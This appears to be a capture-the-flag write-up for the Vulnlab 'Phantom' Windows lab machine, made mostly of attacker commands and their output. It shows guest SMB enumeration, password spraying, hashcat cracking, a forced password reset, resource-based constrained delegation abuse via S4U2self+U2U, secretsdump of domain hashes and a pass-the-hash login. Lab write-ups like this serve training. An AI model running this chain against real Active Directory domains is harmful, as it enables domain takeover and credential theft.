vulnlab-phantom

vulnlab-phantom

a medium windows machine

┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares     
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest: 
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share                 
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share 
SMB         dc.phantom.vl   445    DC               Public          READ            
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share

.

crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt| cut -d '\' -f2 | awk '{print $1}' | tee users.txt

.

smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public                                       

Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

        6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml 
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>

EML view gives

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph<redacted>t!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phant

.

crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce

hashcat to find pass for verasign file

hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus 

found in backup file /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/ lstanley gB<redacted>Rc

.

crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success

.

crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp   

Here comes the fun

net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024           
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024 
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0

Let’s delegate

impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=cross.ccache

over-pass-the-hash

impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=cross.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl 
 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=cross.ccache

.

impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=cAdministrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

.

impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::

.

evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'

That was fun.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *